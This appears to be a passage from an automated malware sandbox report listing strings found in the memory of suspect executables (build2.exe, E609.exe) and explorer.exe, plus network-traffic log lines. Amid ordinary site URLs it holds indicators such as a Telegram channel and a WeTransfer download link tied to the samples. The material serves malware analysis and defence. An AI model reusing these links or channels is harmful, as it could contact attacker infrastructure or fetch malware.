Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: build2.exe, 00000013.00000003.2330175693.00000000008EF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2319193965.00000000008E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: build2.exe, 00000013.00000003.2330175693.00000000008EF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2319193965.00000000008E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: build2.exe, 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/copterwin
Source: E609.exe, 0000000F.00000002.2883282984.000000000310E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wetransfer.com/downloads
Source: E609.exe, 0000000F.00000002.2883282984.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000892000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000753000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1692249717.000000000C557000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1692249717.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2706345491.000000000900D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/1
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/86-6cb1-4744-a649-0782dee5c50c
Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/crime/fingerprints-on-ransom-n
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/technology/do-parallel-universes-exist/ss-AA17h065
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
